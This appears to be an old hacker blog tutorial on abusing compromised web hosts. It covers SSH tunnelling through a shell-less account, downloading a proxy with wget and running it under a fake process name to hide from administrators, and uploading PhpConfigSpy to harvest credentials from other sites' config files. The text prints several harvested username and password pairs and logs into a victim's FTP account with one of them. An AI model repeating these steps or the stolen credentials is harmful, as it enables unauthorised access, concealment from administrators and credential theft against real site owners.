Maybe it’s only answer many question about “how to tunneling using ssh when the ssh shell cannot started”. There will not any problem if ssh shell is activated, you can direct them to tunneling using this way.
In this case, you have IP target that support port 22. It’s mean you can using them to tunneling (of course you must know the user and password :D) even though ssh shell is cannot started.
You can scan the target using phpconfigspy to grab and get the login password.

Let’s we started the lesson.
I find the target and scan them, lucky for me because i got user and password.
alvoacusxxx.pt
[FTP] elaboran:sggvhbui7 Success
If you login to that target using the user password, you will be prompt like this
login as: elaboran
elaboran@alvoacusxxx.pt’s password:
Last login: Fri May 15 02:43:04 2009 from 41.233.169.205
Shell access is not enabled on your account!
If you need shell access please contact support.
Don’t worry, you can still using that target to tunneling. The way will be similar with ssh tunnel, you just adding some configuration on putty.
Look at left side putty on Category tab, breakdown all the menu and you will find SSH tab. Choose SSH and give checkbox on the right side “Don’t start a shell or command at all” and “Enable Compression”.
It’s finish, you can login using that user password. You need to know if the login is correct, there will no effect after you login on screen. Putty screen will stop under password, but tunneling is work now.

You have ssh shell or target shell inject ? and you don’t know for what that shell ??
I will try to assist you how to make proxy using that ssh. First, get the source of proxy.tgz
If you using shell inject, you must find directory that have permission 777 (drwxrrwxrwx) with this command “find / - tipe d -perm 777″.
Look the step by step to build proxy bellow :

[root@vps ~]# wget http://geocities.com/databyroe/byroe/proxy.tgz
–01:30:35– http://geocities.com/databyroe/byroe/proxy.tgz
Resolving geocities.com… 98.137.46.72
Connecting to geocities.com|98.137.46.72|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 54004 (53K) [application/x-compressed]
Saving to: `proxy.tgz’

100%[=======================================>] 54,004 –.-K/s in 0.04s

01:30:35 (1.21 MB/s) - `proxy.tgz’ saved [54004/54004]

[root@vps ~]# tar -zxvf proxy.tgz
pro/
pro/xh
pro/prox

[root@vps ~]# cd pro
[root@vps pro]# ls -lrt
total 152
-rwxr–r– 1 33 33 21516 Jun 8 2006 xh
-rwxr-xr-x 1 33 33 124828 Jun 8 2006 prox
[root@vps pro]# ./xh -s ./httpd ./prox -a -d -p2020
==> Fakename: ./httpd PidNum: 20132

Proxy already done and ready to use. Use the IP of ssh shell and 2020 for port.
That proxy is running using fakename ./httpd to blind the real administrator.
If you want to kill that proxy you can kill by PidNum (20132) using this command “kill -9 20132″.

PhpConfigSpy is one tool that is great to get some Account in the website like cpanel login, ssh login (if web target supported ssh) and maybe database login.
Most of us, after getting a web target (Via inject PHP) we will use that web only for BOT (EGGDROP, PSYBNC). Why we do not try to get full access to the Web target.
Let’s we try to get some information login from web target with PhpConfigSpy tool.
Upload PhpConfigSpy.txt into web target, and after that rename this file from .txt become .php. It’s finish, that’s all. You can test that tool using browser (IE, Firefox, Opera, etc). For Example http://www.yourtarget.com/portal/images/phpconfigspy.php.
And this is the result of scaning :

[+] Founded 113 entrys in /etc/passwd
[+] Founded 113 readable public_html directories
[~] Searching for passwords in config.* files…

[+] /home/cofinca/public_html/portal/mambots/editors/fckeditor/editor/filemanager/connectors/php/config.php
ew database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix, $mosConfig
[+] /home/bsidenet/public_html/configuration.php
bside123
[FTP] bsidenet:bside123 Success
[+] /home/gratis/public_html/configuration.php
deko93tg
[FTP] gratis:deko93tg Success

Binggo… That is success !!!
You can check that username via FTP or SSH (if target supported SSH)
Let we check together for this login
[FTP] bsidenet:bside123 Success
That’s mean user : bsidenet and password : bside123

C:\Documents and Settings\0286061961>ftp alvoaxxxx.pt
Connected to alvoaxxxx.pt.
220———- Welcome to Pure-FTPd [TLS] ———-
220-You are user number 1 of 50 allowed.
220-Local time is now 04:02. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
User (alvoaxxxx.pt:(none)): bsidenet
331 User bsidenet OK. Password required
Password:
230-User bsidenet has group access to: bsidenet
230 OK. Current restricted directory is /
ftp> dir
200 PORT command successful
150 Connecting to port 41080
drwx–x–x 8 32137 bsidenet 4096 Mar 26 23:06 .
drwx–x–x 8 32137 bsidenet 4096 Mar 26 23:06 ..
-rw-r–r– 1 32137 bsidenet 24 Mar 26 23:04 .bash_logout
-rw-r–r– 1 32137 bsidenet 191 Mar 26 23:04 .bash_profile
-rw-r–r– 1 32137 bsidenet 124 Mar 26 23:04 .bashrc
-rw-r–r– 1 32137 bsidenet 19 Mar 26 23:04 .contactemail
drwx—— 2 32137 bsidenet 4096 Apr 23 00:22 .cpanel-datastore
-rw——- 1 32137 bsidenet 14 Apr 23 16:06 .lastlogin
drwxr-xr-x 2 32137 bsidenet 4096 Mar 26 23:04 etc
drwxr-x— 5 32137 12 4096 Mar 26 23:04 mail
drwxr-xr-x 3 32137 bsidenet 4096 Feb 12 2007 public_ftp
drwxr-x— 6 32137 99 4096 Apr 23 17:43 public_html
drwxr-xr-x 7 32137 bsidenet 4096 Mar 26 23:22 tmp
lrwxrwxrwx 1 32137 bsidenet 11 Mar 26 23:04 www -> public_html
226-Options: -a -l
226 14 matches total
ftp: 936 bytes received in 0.00Seconds 936000.00Kbytes/sec.
ftp>

It’s Work Bro